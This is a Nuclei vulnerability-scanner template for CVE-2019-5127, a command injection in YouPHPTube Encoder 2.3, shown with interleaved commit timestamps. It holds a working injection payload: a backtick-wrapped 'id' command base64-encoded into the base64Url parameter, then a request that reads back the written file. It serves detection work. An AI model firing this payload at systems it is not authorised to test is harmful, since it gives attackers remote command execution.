nuclei-templates/http/cves/2019/CVE-2019-5127.yaml

70 lines
2.4 KiB
YAML
Raw Normal View History

id: CVE-2019-5127
info:
name: YouPHPTube Encoder 2.3 - Remote Command Injection
author: pikpikcu
severity: critical
description: YouPHPTube Encoder 2.3 is susceptible to a command injection vulnerability which could allow an attacker to compromise the server. These exploitable unauthenticated command injections exist via the parameter base64Url in /objects/getImage.php.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the entire system.
2023-09-06 12:53:28 +00:00
remediation: |
Apply the latest patch or upgrade to a version that is not affected by this vulnerability.
reference:
- https://talosintelligence.com/vulnerability_reports/TALOS-2019-0917
- https://nvd.nist.gov/vuln/detail/CVE-2019-5127
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/Elsfa7-110/kenzer-templates
- https://github.com/sobinge/nuclei-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-5127
cwe-id: CWE-78
epss-score: 0.97422
epss-percentile: 0.99928
2023-09-06 12:53:28 +00:00
cpe: cpe:2.3:a:youphptube:youphptube_encoder:2.3:*:*:*:*:*:*:*
metadata:
max-request: 4
2023-07-11 19:49:27 +00:00
vendor: youphptube
product: youphptube_encoder
2023-12-05 09:50:33 +00:00
tags: cve,cve2019,rce,youphptube
2023-07-20 07:43:09 +00:00
variables:
filename: "{{to_lower(rand_text_alpha(5))}}"
encode: "`id > {{filename}}.txt`"
http:
- method: GET
path:
2023-07-20 07:43:09 +00:00
- "{{BaseURL}}/objects/getImage.php?base64Url={{base64(encode)}}=&format=png"
- "{{BaseURL}}/objects/getImageMP4.php?base64Url={{base64(encode)}}=&format=jpg"
- "{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url={{base64(encode)}}=&format=jpg"
2023-07-11 19:49:27 +00:00
headers:
Content-Type: application/x-www-form-urlencoded
2023-07-11 19:49:27 +00:00
- method: GET
path:
2023-07-20 07:43:09 +00:00
- "{{BaseURL}}/objects/{{filename}}.txt"
2023-07-11 19:49:27 +00:00
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
2021-03-04 15:23:55 +00:00
- type: word
2023-07-11 19:49:27 +00:00
part: body
2021-03-04 15:23:55 +00:00
words:
- "uid="
- "gid="
- "groups="
condition: and
2021-03-04 15:23:55 +00:00
- type: word
2023-07-11 19:49:27 +00:00
part: header
2021-03-04 15:23:55 +00:00
words:
- text/plain
- type: status
status:
- 200
# digest: 4a0a00473045022100d293f99f9ab6d9d276667e30d09d39ddcf034620c899234ce29c4fb250db19b002205fa55d438fa8a42a9cc6249546f40cdedd11f090d2311cb7f3e9c5f3c0efb7a8:922c64590222798bb761d5b6d8e72950